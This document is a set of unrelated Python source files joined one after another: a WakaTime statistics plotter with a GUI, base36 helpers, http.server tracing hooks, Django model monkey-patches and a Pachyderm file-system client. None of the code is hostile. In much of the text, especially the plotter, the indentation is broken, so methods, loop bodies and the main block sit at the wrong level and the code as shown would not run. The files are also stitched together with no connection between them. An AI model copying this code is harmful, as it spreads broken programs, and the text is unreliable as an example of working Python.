        for index in reversed(removed_at_indexes):
            del(self.languages[self.keys[index]])
            del(self.keys[index])
            del(self.total_times[index])
class EditorsStats(Stats):
    '''Subclass that holds the stats for the different editors.'''
def __init__(self):
self.editors = {}
self.keys = []
self.total_times = []
def populate_stats(self, data):
        '''Adds the editor stats to the lookup structure.
        Parameters:
        data -- The data read from the JSON file.
        '''
        #How many days' worth of stats have been added to the editors
number_of_days = 0
        #Go through all days
        for day in data["days"]:
            #Skip the day depending on the user-given arguments
if day["date"] < str(start_date):
continue
elif day["date"] > str(end_date):
continue
number_of_days += 1
            #If the day has no editor stats
            if len(day["editors"]) == 0:
                #Add zero hours for that day to every editor
                for editor in self.editors:
                    self.editors[editor].append(0.0)
            #If the day has editor stats
            else:
                #Go through all editors
                for editor in day["editors"]:
                    #Skip the editor if the user wants to
                    if len(searched_stats) == 0:
                        if editor["name"] in ignored_stats:
                            continue
                    else:
                        if editor["name"] not in searched_stats:
                            continue
                    #Add that day's stats to the editor, converted to hours
                    self.editors[editor["name"]].append(Stats.seconds_to_hours(editor["total_seconds"]))
        #Go through all editors
        for editor in self.editors:
            #If a day is missing from the editor's stats, add zero hours for that day
if len(self.editors[editor]) < number_of_days:
self.editors[editor].append(0.0)
def sort_stats_and_populate_keys(self):
        '''Sorts the stats from most used to least used and fills the keys in the corresponding order.'''
total_hours = 0
        #Go through the editors
        for editor in self.editors:
            #Sum up the editor's daily times
            hours = sum(self.editors[editor])
            #Add the time to the total time
            total_hours += hours
            #Add the total time and the key to the lists
            self.total_times.append(hours)
            self.keys.append(editor)
        if minimum_labeling_percentage != 0.0:
            self.unify_stats()
        #Reorder from most used to least used; the lists become tuples
        self.total_times, self.keys = zip(*sorted(zip(self.total_times, self.keys), reverse=True))
def unify_stats(self):
        '''Merges stats under the label Other according to the given threshold.'''
        removed_at_indexes = []
        #Add the label Other if needed
        if "Other" not in self.keys:
            self.keys.append("Other")
            self.total_times.append(0.0)
            self.editors["Other"] = [0.0 for value in self.editors[self.keys[0]]]
        #Add the shares that fall below the threshold to Other
        for index, total_time in enumerate(self.total_times):
            if self.keys[index] == "Other":
                continue
            elif total_time / sum(self.total_times) * 100.0 < minimum_labeling_percentage:
                self.editors["Other"] = np.add(self.editors["Other"], self.editors[self.keys[index]]).tolist()
                self.total_times[self.keys.index("Other")] += self.total_times[index]
                removed_at_indexes.append(index)
        #Remove the Other label and its stats if it is unnecessary, and exit the method
        if len(removed_at_indexes) == 0:
            del(self.total_times[self.keys.index("Other")])
            del(self.editors["Other"])
            self.keys.remove("Other")
            return
        #Remove the daily stats, labels, and total times of the stats merged into Other
        for index in reversed(removed_at_indexes):
            del(self.editors[self.keys[index]])
            del(self.keys[index])
            del(self.total_times[index])
class OperatingSystemsStats(Stats):
    '''Subclass that holds the stats for the different operating systems.'''
def __init__(self):
self.operating_systems = {}
self.keys = []
self.total_times = []
def populate_stats(self, data):
        '''Adds the operating system stats to the lookup structure.
        Parameters:
        data -- The data read from the JSON file.
        '''
        #How many days' worth of stats have been added to the operating systems
number_of_days = 0
        #Go through all days
        for day in data["days"]:
            #Skip the day depending on the user-given arguments
if day["date"] < str(start_date):
continue
elif day["date"] > str(end_date):
continue
number_of_days += 1
            #If the day has no operating system stats
            if len(day["operating_systems"]) == 0:
                #Add zero hours for that day to every operating system
                for operating_system in self.operating_systems:
                    self.operating_systems[operating_system].append(0.0)
            #If the day has operating system stats
            else:
                #Go through all operating systems
                for operating_system in day["operating_systems"]:
                    #Skip the operating system if the user wants to
                    if len(searched_stats) == 0:
                        if operating_system["name"] in ignored_stats:
                            continue
                    else:
                        if operating_system["name"] not in searched_stats:
                            continue
                    #Add that day's stats to the operating system, converted to hours
                    self.operating_systems[operating_system["name"]].append(Stats.seconds_to_hours(operating_system["total_seconds"]))
        #Go through all operating systems
        for operating_system in self.operating_systems:
            #If a day is missing from the operating system's stats, add zero hours for that day
if len(self.operating_systems[operating_system]) < number_of_days:
self.operating_systems[operating_system].append(0.0)
def sort_stats_and_populate_keys(self):
        '''Sorts the stats from most used to least used and fills the keys in the corresponding order.'''
total_hours = 0
        #Go through the operating systems
        for operating_system in self.operating_systems:
            #Sum up the operating system's daily times
            hours = sum(self.operating_systems[operating_system])
            #Add the time to the total time
            total_hours += hours
            #Add the total time and the key to the lists
            self.total_times.append(hours)
            self.keys.append(operating_system)
        if minimum_labeling_percentage != 0.0:
            self.unify_stats()
        #Reorder from most used to least used; the lists become tuples
        self.total_times, self.keys = zip(*sorted(zip(self.total_times, self.keys), reverse=True))
def unify_stats(self):
        '''Merges stats under the label Other according to the given threshold.'''
        removed_at_indexes = []
        #Add the label Other if needed
        if "Other" not in self.keys:
            self.keys.append("Other")
            self.total_times.append(0.0)
            self.operating_systems["Other"] = [0.0 for value in self.operating_systems[self.keys[0]]]
        #Add the shares that fall below the threshold to Other
        for index, total_time in enumerate(self.total_times):
            if self.keys[index] == "Other":
                continue
            elif total_time / sum(self.total_times) * 100.0 < minimum_labeling_percentage:
                self.operating_systems["Other"] = np.add(self.operating_systems["Other"], self.operating_systems[self.keys[index]]).tolist()
                self.total_times[self.keys.index("Other")] += self.total_times[index]
                removed_at_indexes.append(index)
        #Remove the Other label and its stats if it is unnecessary, and exit the method
        if len(removed_at_indexes) == 0:
            del(self.total_times[self.keys.index("Other")])
            del(self.operating_systems["Other"])
            self.keys.remove("Other")
            return
        #Remove the daily stats, labels, and total times of the stats merged into Other
        for index in reversed(removed_at_indexes):
            del(self.operating_systems[self.keys[index]])
            del(self.keys[index])
            del(self.total_times[index])
#Draw the graphs
def draw_graph(days, keys, datasets, colors_file_path):
with open(colors_file_path, "r") as colors_file:
colors_data = yaml.safe_load(colors_file)
fig = go.Figure()
    #Go through all the stats
for key in keys:
try:
fig.add_trace(go.Scatter(x=days, y=datasets[key], mode="lines", name=key, marker=dict(color=colors_data[key]["color"])))
except Exception:
fig.add_trace(go.Scatter(x=days, y=datasets[key], mode="lines", name=key, marker=dict(color=colors_data["Other"]["color"])))
fig.update_layout(yaxis_title="t (h)", plot_bgcolor="white")
fig.update_xaxes(showline=True, linewidth=1, linecolor="black", mirror=True)
fig.update_yaxes(showline=True, linewidth=1, linecolor="black", mirror=True)
fig.show()
#Draw the pie chart
def draw_pie_chart(keys, total_times, colors_file_path):
labels = []
colors = []
total_hours = 0
with open(colors_file_path, "r") as colors_file:
colors_data = yaml.safe_load(colors_file)
    #Go through all the stats
    for index, key in enumerate(keys):
        hours = total_times[index]
        #Add the time to the total time
        total_hours += hours
        #Add the label to the lists
        labels.append(key + " - {0} h {1} min".format(int(hours), int((hours - int(hours)) * 60)))
        try:
            colors.append(colors_data[key]["color"])
        except Exception:
            colors.append(colors_data["Other"]["color"])
    #Add the percentages to the legend
    for index, time in enumerate(total_times):
        labels[index] += " ({0:.2f} %)".format(total_times[index] / total_hours * 100)
    #Draw the pie chart
fig = px.pie(names=labels, values=total_times, color_discrete_sequence=colors)
fig.update_traces(marker=dict(line=dict(color="black", width=0.5)), textinfo="none", hovertemplate=labels)
fig.show()
#The actual program
if __name__ == "__main__":
    #Prepare to read the arguments
parser = argparse.ArgumentParser(
description="You can use this program to show your statistics from WakaTime.",
usage="python WakaFree.py {-h | -G | [-g GRAPHS] [-t TOTALS] [{-i IGNORE | -s SEARCH}] [-m MINIMUM_LABELING_PERCENTAGE] [--start-date START_DATE] [--end-date END_DATE] FILE}")
parser.add_argument("file", metavar="FILE", nargs="?", default="", help="path to file with statistics")
parser.add_argument("-G", "--gui", action="store_true", help="use graphical user interface")
parser.add_argument("-g", "--graphs", help="show daily statistics: string with l, e, o for languages, editors, operating systems")
parser.add_argument("-t", "--totals", help="show total times: string with l, e, o for languages, editors, operating systems")
parser.add_argument("-i", "--ignore", help="ignored stats: string with labels separated by commas (without spaces)")
parser.add_argument("-s", "--search", help="stats to search for: string with labels separated by commas (without spaces)")
parser.add_argument("-m", "--minimum-labeling-percentage", help="add together (under label Other) stats with lesser percentage than the given value")
parser.add_argument("--start-date", help="start date in format YYYY-MM-DD (inclusive)")
parser.add_argument("--end-date", help="end date in format YYYY-MM-DD (inclusive)")
    #Read the arguments
args = parser.parse_args()
file_name = args.file if args.file else ""
graphs = args.graphs if args.graphs else ""
totals = args.totals if args.totals else ""
ignored_stats = args.ignore.split(",") if args.ignore else []
searched_stats = args.search.split(",") if args.search else []
minimum_labeling_percentage = float(args.minimum_labeling_percentage) if args.minimum_labeling_percentage else 0.0
start_date = datetime(int(args.start_date[0:4]), int(args.start_date[5:7]), int(args.start_date[8:10])).date() if args.start_date else datetime(1, 1, 1).date()
end_date = datetime(int(args.end_date[0:4]), int(args.end_date[5:7]), int(args.end_date[8:10])).date() if args.end_date else datetime(9999, 12, 31).date()
    #If the user wants a graphical user interface
if args.gui:
try:
ctypes.windll.shcore.SetProcessDpiAwareness(True)
except:
pass
help_file = "The file that contains your statistics."
help_graphs = "Daily statistics."
help_totals = "Total times."
help_ignore = "Ignored stats. Labels separated by commas and nothing more."
help_search = "Stats to search for. Labels separated by commas and nothing more.\nIf nothing is entered then all the stats in the given file will be read."
        help_minimum_labeling_percentage = "Inclusive lower limit for labeling the stats.\nEverything under this percentage will be moved to the group Other."
help_start_date = "Start date in format YYYY-MM-DD. Inclusive.\nIf no date is entered then the stats will be drawn from the very beginning."
help_end_date = "End date in format YYYY-MM-DD. Inclusive.\nIf no date is entered then the stats will be drawn to the very end."
layout = [
[sg.Text("Hover over a variable name to get help.")],
[sg.HorizontalSeparator()],
[sg.Text("File*", tooltip=help_file), sg.InputText(key="input_file"), sg.FileBrowse(file_types=(("JSON Files", "*.json"),))],
[
sg.Text("Graphs", tooltip=help_graphs),
sg.Checkbox("Languages", default=True, key="input_graphs_l"),
sg.Checkbox("Editors", default=True, key="input_graphs_e"),
sg.Checkbox("Operating systems", default=True, key="input_graphs_o")
],
[
sg.Text("Totals", tooltip=help_totals),
sg.Checkbox("Languages", default=True, key="input_totals_l"),
sg.Checkbox("Editors", default=True, key="input_totals_e"),
sg.Checkbox("Operating systems", default=True, key="input_totals_o")
],
[sg.Text("Ignore**", tooltip=help_ignore), sg.InputText(key="input_ignore"), sg.Text("or"), sg.Text("Search**", tooltip=help_search), sg.InputText(key="input_search")],
[sg.Text("Minimum labeling percentage", tooltip=help_minimum_labeling_percentage), sg.InputText("0.0", key="input_minimum_labeling_percentage"), sg.Text("%")],
[sg.Text("Start date", tooltip=help_start_date), sg.InputText("YYYY-MM-DD", key="input_start_date"), sg.CalendarButton("Calendar", format="%Y-%m-%d")],
[sg.Text("End date", tooltip=help_end_date), sg.InputText("YYYY-MM-DD", key="input_end_date"), sg.CalendarButton("Calendar", format="%Y-%m-%d")],
[sg.OK()],
[sg.HorizontalSeparator()],
[sg.Text("* Required.")],
[sg.Text("** Labels separated by commas only.")]
]
window = sg.Window("WakaFree", layout)
while True:
event, values = window.read()
if event in (sg.WIN_CLOSED, "Cancel"):
break
elif event == "OK":
file_name = values["input_file"]
graphs += "l" if values["input_graphs_l"] else ""
graphs += "e" if values["input_graphs_e"] else ""
graphs += "o" if values["input_graphs_o"] else ""
totals += "l" if values["input_totals_l"] else ""
totals += "e" if values["input_totals_e"] else ""
totals += "o" if values["input_totals_o"] else ""
ignored_stats = values["input_ignore"].split(",") if values["input_ignore"] != "" else []
searched_stats = values["input_search"].split(",") if values["input_search"] != "" else []
minimum_labeling_percentage = float(values["input_minimum_labeling_percentage"])
try:
start_date = datetime(int(values["input_start_date"][0:4]), int(values["input_start_date"][5:7]), int(values["input_start_date"][8:10])).date()
except:
start_date = datetime(1, 1, 1).date()
try:
end_date = datetime(int(values["input_end_date"][0:4]), int(values["input_end_date"][5:7]), int(values["input_end_date"][8:10])).date()
except:
end_date = datetime(9999, 12, 31).date()
break
window.close()
    #If the user gave neither of the optional drawing arguments
    if graphs == "" and totals == "":
        graphs = "leo"
        totals = "leo"
    #If the user gave a file
if file_name != "":
        #Open the file
        with open(file_name, "r") as file:
            #Project directory
            project_directory = os.path.dirname(__file__)
            #Create the objects for the stats
            languages = LanguagesStats()
            editors = EditorsStats()
            operating_systems = OperatingSystemsStats()
            #Fetch the data
            data = json.load(file)
            #Prepare to read the stats
Stats.fetch_days_and_labels(
data,
languages=languages.languages if "l" in (graphs + totals).lower() else None,
editors=editors.editors if "e" in (graphs + totals).lower() else None,
operating_systems=operating_systems.operating_systems if "o" in (graphs + totals).lower() else None,
ignored_stats=ignored_stats, searched_stats=searched_stats)
            #Convert the dates to the right format
            Stats.convert_dates()
            #Fetch the requested stats
if "l" in (graphs + totals).lower():
languages.populate_stats(data)
languages.sort_stats_and_populate_keys()
if "e" in (graphs + totals).lower():
editors.populate_stats(data)
editors.sort_stats_and_populate_keys()
if "o" in (graphs + totals).lower():
operating_systems.populate_stats(data)
operating_systems.sort_stats_and_populate_keys()
            #If the user wants to draw the graphs
            if graphs != "" or (graphs == "" and totals == ""):
                #Language graphs
                if "l" in graphs.lower():
                    draw_graph(Stats.days, languages.keys, languages.languages, os.path.join(project_directory, "Colors/languages_colors.yml"))
                #Editor graphs
                if "e" in graphs.lower():
                    draw_graph(Stats.days, editors.keys, editors.editors, os.path.join(project_directory, "Colors/editors_colors.yml"))
                #Operating system graphs
                if "o" in graphs.lower():
                    draw_graph(Stats.days, operating_systems.keys, operating_systems.operating_systems, os.path.join(project_directory, "Colors/operating_systems_colors.yml"))
            #If the user wants to show the total times
            if totals != "" or (graphs == "" and totals == ""):
                #Language totals
                if "l" in totals.lower():
                    draw_pie_chart(languages.keys, languages.total_times, os.path.join(project_directory, "Colors/languages_colors.yml"))
                #Editor totals
                if "e" in totals.lower():
                    draw_pie_chart(editors.keys, editors.total_times, os.path.join(project_directory, "Colors/editors_colors.yml"))
                #Operating system totals
                if "o" in totals.lower():
                    draw_pie_chart(operating_systems.keys, operating_systems.total_times, os.path.join(project_directory, "Colors/operating_systems_colors.yml"))
    #If the user gave no file or any optional argument
else:
if not args.gui:
print("\nYou did not specify what you would like to do. To get help, try using either of the following commands:\n\npython WakaFree.py -h\npython WakaFree.py --help") | nilq/baby-python | python |
from keg_elements.extensions import lazy_gettext as _
def base36_to_int(s):
"""
Convert a base 36 string to an int. Raise ValueError if the input won't fit
into an int.
https://git.io/vydSi
"""
# To prevent overconsumption of server resources, reject any
# base36 string that is longer than 13 base36 digits (13 digits
# is sufficient to base36-encode any 64-bit integer)
if len(s) > 13:
raise ValueError(_("Base36 input too large"))
return int(s, 36)
def int_to_base36(i):
"""Convert an integer to a base36 string.
https://git.io/vydS1
"""
char_set = '0123456789abcdefghijklmnopqrstuvwxyz'
if i < 0:
raise ValueError(_("Negative base36 conversion input."))
if i < 36:
return char_set[i]
b36 = ''
while i != 0:
i, n = divmod(i, 36)
b36 = char_set[n] + b36
return b36
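# A short round-trip sanity check (added for illustration):
if __name__ == '__main__':
    assert int_to_base36(12345) == '9ix'
    assert base36_to_int('9ix') == 12345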
| nilq/baby-python | python |
from ..data.context import setCurTxn, getCurTxn
from ..data.txn import Transaction
from ..constants import classNameKey, methodNameKey, preHookKey, postHookKey
def captureTxn(args, kwargs):
txn = Transaction()
setCurTxn(txn)
def endTxn(args, kwargs):
txn = getCurTxn()
if txn is None or args is None:
return
if len(args) <= 0:
return
obj = args[0]
if obj is None:
return
if hasattr(obj,'path'):
txn.setUrl(getattr(obj,'path'))
if hasattr(obj,'command'):
txn.setMethod(getattr(obj, 'command'))
txn.end()
def extractStatusCode(args, kwargs):
txn = getCurTxn()
if txn is None or args is None:
return
if len(args) <= 1:
return
txn.setStatus(args[1])
modulesInfo = {
'http.server': [
{
classNameKey: 'BaseHTTPRequestHandler',
methodNameKey: 'handle_one_request',
preHookKey: captureTxn,
postHookKey: endTxn
},
{
classNameKey: 'BaseHTTPRequestHandler',
methodNameKey: 'send_response',
postHookKey: extractStatusCode
}
]
}
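# A minimal sketch (added for illustration) of how an instrumentation agent
# might consume modulesInfo: for each entry, wrap the named method of the
# named class so the pre/post hooks run around the original call. This helper
# is hypothetical and not part of the original module.
def _apply_hooks(module, info):
    import functools
    for spec in info:
        cls = getattr(module, spec[classNameKey])
        original = getattr(cls, spec[methodNameKey])
        @functools.wraps(original)
        def wrapper(*args, __orig=original, __spec=spec, **kwargs):
            if preHookKey in __spec:
                __spec[preHookKey](args, kwargs)
            result = __orig(*args, **kwargs)
            if postHookKey in __spec:
                __spec[postHookKey](args, kwargs)
            return result
        setattr(cls, spec[methodNameKey], wrapper)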
| nilq/baby-python | python |
from django.contrib.auth.models import User, Group
from django.db import models
from primer.db.models import UUIDField
# Monkey Patch User Model
User.add_to_class('uuid', UUIDField())
User.add_to_class('created', models.DateTimeField(auto_now_add=True, editable = False, blank = True, null = True))
User.add_to_class('modified', models.DateTimeField(auto_now=True, blank = True, null = True))
# Monkey Patch Group Model
Group.add_to_class('uuid', UUIDField())
Group.add_to_class('created', models.DateTimeField(auto_now_add=True, editable = False, blank = True, null = True))
Group.add_to_class('modified', models.DateTimeField(auto_now=True, blank = True, null = True)) | nilq/baby-python | python |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
try:
    from collections.abc import Iterable  # Python 3.3+
except ImportError:  # Python 2 fallback
    from collections import Iterable
import os
from contextlib import contextmanager
import six
from python_pachyderm.client.pfs.pfs_pb2 import *
from python_pachyderm.client.pfs.pfs_pb2_grpc import *
BUFFER_SIZE = 3 * 1024 * 1024 # 3MB TODO: Base this on some grpc value
class ExtractValueIterator(object):
def __init__(self, r):
self._iter = r
def __iter__(self):
for item in self._iter:
yield item.value
def _commit_from(src, allow_just_repo=False):
if src.__class__.__name__ == "Commit":
return src
elif type(src) in (tuple, list) and len(src) == 2:
return Commit(repo=Repo(name=src[0]), id=src[1])
elif type(src) is str:
repo_name, commit_id = src.split('/', 1)
return Commit(repo=Repo(name=repo_name), id=commit_id)
if not allow_just_repo:
raise ValueError(
"Commit should either be a sequence of [repo, commit_id] or a string in the form 'repo/branch/commit_id")
return Commit(repo=Repo(name=src))
def _make_list(x):
    # if `x` is not iterable (strings and bytes count as scalars), wrap it in a list
    if isinstance(x, six.string_types + (six.binary_type,)) or not isinstance(x, Iterable):
        x = [x]
    return x
def _is_iterator(x):
return hasattr(x, 'next') or hasattr(x, '__next__')
class PfsClient(object):
def __init__(self, host=None, port=None):
"""
Creates a client to connect to Pfs
:param host: The pachd host. Default is 'localhost', which is used with `pachctl port-forward`
:param port: The port to connect to. Default is 30650
"""
# If a host or port is not specified, then try to set using environment variables or use the defaults.
if host is None:
host = os.environ.get('PACHD_SERVICE_HOST', 'localhost')
if port is None:
port = os.environ.get('PACHD_SERVICE_PORT_API_GRPC_PORT', '30650')
self.channel = grpc.insecure_channel('{}:{}'.format(host, port))
self.stub = APIStub(self.channel)
def create_repo(self, repo_name, description=None):
"""
Creates a new Repo object in pfs with the given name. Repos are
the top level data object in pfs and should be used to store data of a
similar type. For example rather than having a single Repo for an entire
        project you might have separate Repos for logs, metrics, database dumps etc.
:param repo_name: Name of the repo
:param description: Repo description
"""
self.stub.CreateRepo(CreateRepoRequest(repo=Repo(name=repo_name), description=description))
def inspect_repo(self, repo_name):
"""
returns info about a specific Repo.
:param repo_name: Name of the repo
:return: A RepoInfo object
"""
return self.stub.InspectRepo(InspectRepoRequest(repo=Repo(name=repo_name)))
def list_repo(self):
"""
Returns info about all Repos.
:return: A list of RepoInfo objects
"""
x = self.stub.ListRepo(ListRepoRequest())
if hasattr(x, 'repo_info'):
return x.repo_info
return []
def delete_repo(self, repo_name=None, force=False, all=False):
"""
Deletes a repo and reclaims the storage space it was using. Note
that as of 1.0 we do not reclaim the blocks that the Repo was referencing,
this is because they may also be referenced by other Repos and deleting them
would make those Repos inaccessible. This will be resolved in later
versions.
:param repo_name: The name of the repo
:param force: if set to true, the repo will be removed regardless of errors.
This argument should be used with care.
:param all: Delete all repos
"""
if not all:
if repo_name:
self.stub.DeleteRepo(DeleteRepoRequest(repo=Repo(name=repo_name), force=force))
else:
raise ValueError("Either a repo_name or all=True needs to be provided")
else:
if not repo_name:
self.stub.DeleteRepo(DeleteRepoRequest(force=force, all=all))
else:
raise ValueError("Cannot specify a repo_name if all=True")
def start_commit(self, repo_name, branch=None, parent=None):
"""
Begins the process of committing data to a Repo. Once started
you can write to the Commit with PutFile and when all the data has been
written you must finish the Commit with FinishCommit. NOTE, data is not
persisted until FinishCommit is called.
:param repo_name: The name of the repo
:param branch: is a more convenient way to build linear chains of commits. When a
commit is started with a non empty branch the value of branch becomes an
alias for the created Commit. This enables a more intuitive access pattern.
When the commit is started on a branch the previous head of the branch is
used as the parent of the commit.
:param parent: specifies the parent Commit, upon creation the new Commit will
appear identical to the parent Commit, data can safely be added to the new
commit without affecting the contents of the parent Commit. You may pass ""
as parentCommit in which case the new Commit will have no parent and will
initially appear empty.
:return: Commit object
"""
return self.stub.StartCommit(StartCommitRequest(parent=Commit(repo=Repo(name=repo_name),
id=parent),
branch=branch))
def finish_commit(self, commit):
"""
Ends the process of committing data to a Repo and persists the
Commit. Once a Commit is finished the data becomes immutable and future
attempts to write to it with PutFile will error.
:param commit: A tuple or string representing the commit
"""
self.stub.FinishCommit(FinishCommitRequest(commit=_commit_from(commit)))
@contextmanager
def commit(self, repo_name, branch=None, parent=None):
"""
A context manager for doing stuff inside a commit
"""
commit = self.start_commit(repo_name, branch, parent)
try:
yield commit
except Exception as e:
print("An exception occurred during an open commit. "
"Trying to finish it (Currently a commit can't be cancelled)")
raise e
finally:
self.finish_commit(commit)
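    # A short usage sketch (added for illustration; the repo, branch, and file
    # names are arbitrary): the context manager starts a commit, lets you
    # write into it, and always finishes it, even on error.
    #
    #   client = PfsClient()
    #   client.create_repo("test")
    #   with client.commit("test", branch="master") as c:
    #       client.put_file_bytes(c, "/greeting.txt", b"hello")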
def inspect_commit(self, commit):
"""
returns info about a specific Commit.
:param commit: A tuple or string representing the commit
:return: CommitInfo object
"""
return self.stub.InspectCommit(InspectCommitRequest(commit=_commit_from(commit)))
def provenances_for_repo(self, repo_name):
provenances = {}
commits = self.list_commit(repo_name)
        # sort the CommitInfo objects by finish time; the original sorted only
        # the commit ids, which broke the provenance lookup below
        sorted_commits = sorted(commits, key=lambda c: c.finished.seconds)
        for c in sorted_commits:
            for p in c.provenance:
                provenances[p.id] = c.commit.id
return provenances
def list_commit(self, repo_name, to_commit=None, from_commit=None, number=0):
"""
Lists commits.
:param repo_name: If only `repo_name` is given, all commits in the repo are returned.
:param to_commit: optional. only the ancestors of `to`, including `to` itself,
are considered.
        :param from_commit: optional. only the descendants of `from`, including `from`
itself, are considered.
:param number: optional. determines how many commits are returned. If `number` is 0,
all commits that match the aforementioned criteria are returned.
:return: A list of CommitInfo objects
"""
req = ListCommitRequest(repo=Repo(name=repo_name), number=number)
if to_commit is not None:
req.to.CopyFrom(_commit_from(to_commit))
if from_commit is not None:
getattr(req, 'from').CopyFrom(_commit_from(from_commit))
x = self.stub.ListCommit(req)
if hasattr(x, 'commit_info'):
return x.commit_info
return []
def delete_commit(self, commit):
"""
deletes a commit.
Note it is currently not implemented.
:param commit: A tuple or string representing the commit
"""
self.stub.DeleteCommit(DeleteCommitRequest(commit=_commit_from(commit)))
def flush_commit(self, commits, repos=tuple()):
"""
blocks until all of the commits which have a set of commits as
provenance have finished. For commits to be considered they must have all of
the specified commits as provenance. This in effect waits for all of the
jobs that are triggered by a set of commits to complete.
It returns an error if any of the commits it's waiting on are cancelled due
to one of the jobs encountering an error during runtime.
Note that it's never necessary to call FlushCommit to run jobs, they'll run
no matter what, FlushCommit just allows you to wait for them to complete and
see their output once they do.
:param commits: A commit or a list of commits to wait on
:param repos: Optional. Only the commits up to and including those repos
will be considered, otherwise all repos are considered.
:return: An iterator of CommitInfo objects
"""
return self.stub.FlushCommit(FlushCommitRequest(commit=[_commit_from(c) for c in commits],
to_repo=[Repo(name=r) for r in repos]))
def subscribe_commit(self, repo_name, branch, from_commit_id=None):
"""
SubscribeCommit is like ListCommit but it keeps listening for commits as
they come in.
:param repo_name: Name of the repo
:param branch: Branch to subscribe to
:param from_commit_id: Optional. only commits created since this commit are returned
:return: Iterator of Commit objects
"""
repo = Repo(name=repo_name)
req = SubscribeCommitRequest(repo=repo, branch=branch)
if from_commit_id is not None:
getattr(req, 'from').CopyFrom(Commit(repo=repo, id=from_commit_id))
return self.stub.SubscribeCommit(req)
def list_branch(self, repo_name):
"""
lists the active branches on a Repo
:param repo_name: The name of the repo
:return: A list of Branch objects
"""
x = self.stub.ListBranch(ListBranchRequest(repo=Repo(name=repo_name)))
if hasattr(x, 'branch_info'):
return x.branch_info
return []
def set_branch(self, commit, branch_name):
"""
sets a commit and its ancestors as a branch
:param commit: A tuple or string representing the commit
:param branch_name: The name for the branch to set
"""
self.stub.SetBranch(SetBranchRequest(commit=_commit_from(commit),
branch=branch_name))
def delete_branch(self, repo_name, branch_name):
"""
deletes a branch, but leaves the commits themselves intact.
In other words, those commits can still be accessed via commit IDs and
other branches they happen to be on.
:param repo_name: The name of the repo
:param branch_name: The name of the branch to delete
"""
self.stub.DeleteBranch(DeleteBranchRequest(repo=Repo(name=repo_name),
branch=branch_name))
def put_file_bytes(self, commit, path, value, delimiter=NONE,
target_file_datums=0, target_file_bytes=0):
"""
Uploads a binary bytes array as file(s) in a certain path
:param commit: A tuple or string representing the commit
:param path: Path in the repo the file(s) will be written to
:param value: The data bytes array, or an iterator returning chunked byte arrays
:param delimiter: Optional. causes data to be broken up into separate files with `path`
as a prefix.
:param target_file_datums: Optional. specifies the target number of datums in each written
file it may be lower if data does not split evenly, but will never be
higher, unless the value is 0.
:param target_file_bytes: specifies the target number of bytes in each written
file, files may have more or fewer bytes than the target.
"""
if _is_iterator(value):
def _wrap(v):
for x in v:
yield PutFileRequest(file=File(commit=_commit_from(commit), path=path),
value=x,
delimiter=delimiter,
target_file_datums=target_file_datums,
target_file_bytes=target_file_bytes)
self.stub.PutFile(_wrap(value))
return
def _blocks(v):
for i in range(0, len(v), BUFFER_SIZE):
yield PutFileRequest(file=File(commit=_commit_from(commit), path=path),
value=v[i:i + BUFFER_SIZE],
delimiter=delimiter,
target_file_datums=target_file_datums,
target_file_bytes=target_file_bytes)
self.stub.PutFile(_blocks(value))
def put_file_url(self, commit, path, url, recursive=False):
"""
puts a file using the content found at a URL.
The URL is sent to the server which performs the request.
:param commit: A tuple or string representing the commit
:param path: The path to the file
:param url: The url to download
:param recursive: allow for recursive scraping of some types URLs for example on s3:// urls.
"""
self.stub.PutFile(iter([PutFileRequest(file=File(commit=_commit_from(commit), path=path),
url=url,
recursive=recursive)]))
def get_file(self, commit, path, offset_bytes=0, size_bytes=0, extract_value=True):
"""
returns the contents of a file at a specific Commit.
:param commit: A tuple or string representing the commit
:param path: The path of the file
:param offset_bytes: Optional. specifies a number of bytes that should be skipped in the beginning of the file.
:param size_bytes: Optional. limits the total amount of data returned, note you will get fewer bytes
than size if you pass a value larger than the size of the file.
If size is set to 0 then all of the data will be returned.
:param extract_value: If True, then an ExtractValueIterator will be return, which
will iterate over the bytes of the file. If False, then the Protobuf
response iterator will return
:return: An iterator over the file or an iterator over the protobuf responses
"""
r = self.stub.GetFile(GetFileRequest(file=File(commit=_commit_from(commit),
path=path),
offset_bytes=offset_bytes,
size_bytes=size_bytes))
if extract_value:
return ExtractValueIterator(r)
return r
def get_files(self, commit, paths, recursive=False):
"""
returns the contents of a list of files at a specific Commit.
:param commit: A tuple or string representing the commit
:param paths: A list of paths to retrieve
:param recursive: If True, will go into each directory in the list recursively
:return: A dictionary of file paths and data
"""
filtered_file_infos = []
for path in paths:
fi = self.inspect_file(commit, path)
if fi.file_type == FILE:
filtered_file_infos.append(fi)
else:
filtered_file_infos += self.list_file(commit, path, recursive=recursive)
filtered_paths = [fi.file.path for fi in filtered_file_infos if fi.file_type == FILE]
return {path: b''.join(self.get_file(commit, path)) for path in filtered_paths}
def inspect_file(self, commit, path):
"""
returns info about a specific file.
:param commit: A tuple or string representing the commit
:param path: Path to file
:return: A FileInfo object
"""
return self.stub.InspectFile(InspectFileRequest(file=File(commit=_commit_from(commit),
path=path)))
def list_file(self, commit, path, recursive=False):
"""
Lists the files in a directory
:param commit: A tuple or string representing the commit
:param path: The path to the directory
:param recursive: If True, continue listing the files for sub-directories
:return: A list of FileInfo objects
"""
file_infos = self.stub.ListFile(ListFileRequest(file=File(commit=_commit_from(commit),
path=path))).file_info
if recursive:
dirs = [f for f in file_infos if f.file_type == DIR]
files = [f for f in file_infos if f.file_type == FILE]
return sum([self.list_file(commit, d.file.path, recursive) for d in dirs],
files)
return list(file_infos)
def glob_file(self, commit, pattern):
"""
        Returns the files whose paths match the given glob pattern at a commit.
        :param commit: A tuple or string representing the commit
        :param pattern: A glob pattern, e.g. "/dir/*" (the example pattern is illustrative)
:return: A list of FileInfo objects
"""
r = self.stub.GlobFile(GlobFileRequest(commit=_commit_from(commit),
pattern=pattern))
if hasattr(r, 'file_info'):
return r.file_info
return []
def delete_file(self, commit, path):
"""
deletes a file from a Commit.
DeleteFile leaves a tombstone in the Commit, assuming the file isn't written
to later attempting to get the file from the finished commit will result in
not found error.
The file will of course remain intact in the Commit's parent.
:param commit: A tuple or string representing the commit
:param path: The path to the file
"""
self.stub.DeleteFile(DeleteFileRequest(file=File(commit=_commit_from(commit),
path=path)))
def delete_all(self):
self.stub.DeleteAll(google_dot_protobuf_dot_empty__pb2.Empty())
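# A minimal end-to-end sketch (added for illustration; the host/port and the
# repo, branch, and file names are arbitrary): create a repo, write a file in
# a commit, and read the repo's root listing back.
def _pfs_demo():
    client = PfsClient(host="localhost", port="30650")
    client.create_repo("demo", description="scratch repo")
    with client.commit("demo", branch="master") as c:
        client.put_file_bytes(c, "/data.txt", b"some bytes")
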